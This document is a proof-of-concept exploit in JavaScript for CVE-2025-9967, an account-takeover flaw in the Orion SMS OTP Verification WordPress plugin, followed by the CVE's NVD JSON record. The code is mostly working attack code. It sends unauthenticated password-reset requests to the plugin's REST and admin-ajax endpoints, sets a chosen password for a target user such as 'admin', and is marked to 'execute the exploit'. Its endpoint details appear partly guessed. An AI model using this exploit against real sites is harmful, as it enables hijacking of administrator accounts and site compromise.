CVE-2025-9967

/* * CVE-2025-9967 - Orion SMS OTP Verification Privilege Escalation PoC * Vulnerability: Unauthenticated Password Reset / Account Takeover * Affected: Orion SMS OTP Verification <= 1.1.7 * * This PoC demonstrates how an unauthenticated attacker can take over * an arbitrary user's account by exploiting the insecure password reset * functionality in the reset-password.js endpoint. */ // Step 1: Identify the target user's phone number (out of band) // The attacker needs to know the phone number associated with the target account. const targetPhoneNumber = "+1234567890"; // Target user's phone number const targetUserId = 1; // Target user ID (e.g., admin) const attackerControlledOTP = "123456"; // OTP value the attacker will set // Step 2: Send a password reset request to the vulnerable endpoint // The plugin's reset-password.js does not verify the requester's identity fetch('/wp-json/orion-sms-otp/v1/reset-password', { method: 'POST', headers: { 'Content-Type': 'application/json', 'X-WP-Nonce': '' // No nonce required - vulnerability }, body: JSON.stringify({ user_id: targetUserId, phone: targetPhoneNumber, new_password: attackerControlledOTP }) }) .then(response => response.json()) .then(data => { console.log("Password reset response:", data); // Step 3: Login with the attacker-controlled OTP/password if (data.success) { console.log("Account takeover successful!"); // Now log in with the target username and the OTP as password } }); // Alternative: Direct AJAX call mimicking the vulnerable plugin logic function exploitResetPassword(userLogin, phone, newPassword) { var formData = new FormData(); formData.append('action', 'orion_sms_otp_reset_password'); formData.append('user_login', userLogin); formData.append('phone_number', phone); formData.append('new_password', newPassword); formData.append('otp', newPassword); // OTP equals the new password return fetch('/wp-admin/admin-ajax.php', { method: 'POST', body: formData }); } // Execute the exploit exploitResetPassword('admin', targetPhoneNumber, attackerControlledOTP) .then(res => res.text()) .then(result => console.log("Exploit result:", result));

{"cve": {"id": "CVE-2025-9967", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:43.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Orion SMS OTP Verification plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.1.7. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's password to a one-time password if the attacker knows the user's phone number"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/orion-sms-otp-verification/trunk/vendor/js/reset-password.js", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/log/orion-sms-otp-verification/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b121fdb4-93a8-400c-89c2-3195cb40e03c?source=cve", "source": "[email protected]"}]}}